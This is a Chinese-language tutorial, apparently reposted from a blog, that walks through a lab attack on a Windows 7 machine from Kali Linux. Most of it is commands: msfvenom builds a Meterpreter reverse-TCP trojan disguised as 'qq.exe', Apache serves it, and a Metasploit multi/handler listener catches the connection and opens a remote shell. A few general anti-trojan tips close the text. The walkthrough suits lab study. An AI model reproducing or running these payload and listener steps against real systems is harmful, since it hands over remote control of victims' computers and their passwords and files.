admin 管理员组文章数量: 887019
讲Windows常见攻击手段就不可以不讲它,因为它是Windows常见攻击手段里必不可少的一员。他就是木马攻击,首先先说一下他的概述:它是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。木马病毒其实是计算机黑客用于远程控制计算机的程序,将控制程序寄生于被控制的计算机系统中,里应外合,对被感染木马病毒的计算机实施操作。一般的木马病毒程序主要是寻找计算机后门,伺机窃取被控计算机中的密码和重要文件等。可以对被控计算机实施监控、资料修改等非法操作。木马病毒具有很强的隐蔽性,可以根据黑客意图突然发起攻击。
以上就是,对木马的介绍。下面开始进行实验:
首先搭建实验环境:一台攻击机:kali,一台靶机:win7
攻击机kali IP:192.168.220.148
靶机win7 IP:192.168.220.154
然后配置实验环境,将win7的Windows防火墙界面打开,并把它关闭。因为这个会影响实验的结果,所以建议关闭。然后在win7上ping kali查看是否能ping通。再在kali 上ping win7 也查看是否ping通。目的是查看两台机子网络是否联通。查看结果是可以联通。
先制作一个木马,在kali中使用软件msfvenom制作输入命令:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.220.148 (攻击机IP)lport=4444(攻击机端口) -f exe > /root/qq.exe(后面是文件路径)。接着输入cp qq.exe /var/www/html命令,将木马程序复制到/var/www/html文件夹下,输入命令cd /var/www/html 进入文件夹下目录输入ls命令查看有没有多余的文件,发现有 index.html index.nginxdebian.html QQ.exe三个多余的文件,马上删除否则影响实验。于是输入命令了rm -v index.html index.nginx-debian.html QQ.exe(删除多余文件)。然后输入/etc/init.d/apache2 start命令(启动Apache)接着输入命令/etc/init.d/apache2 status(查看Apache进程)。
下面开始攻击在kali中输入命令msfconsole,启动msfconsole接着输入命令use exploit/multi/handler(开始监听),输入命令:setpayloadwindows/meterpreter/reverse_tcp(反弹监听端),输入命令set LHOST 192.168.220.148(是可以反弹到这台机子上),输入命令set LPORT 4444(监听端口号)输入命令show options查看攻击模块,输入命令run开始攻击。攻击完成得到meterpreter,输入命令shell提权,接着输入命令chcp 437为了可以避免乱码,然后输入ipconfig验证实验结果(下面的图是依次而截)
预防木马病毒有以下3点方法:
1、不要浏览危险网站。比如一些黑客,色情网站,本身就是很危险的,其中隐匿着许多病毒与木马,用手机浏览此类网站是非常危险的。
2、保证下载的安全性。网上有许多资源提供电脑下载,然而很多病毒就隐藏在这些资源中,这就要求用户在使用电脑下载各种资源的时候确保下载站点是否安全可靠,尽量避免去个人网站下载。
3、不要打开陌生的QQ邮件请求。陌生的QQ邮件可能带有病毒,收到此类陌生的QQ邮件后立即删除,以免感染木马病毒。
版权声明:本文标题:木马攻击获得Windows7的权限 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1729039789h1310233.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论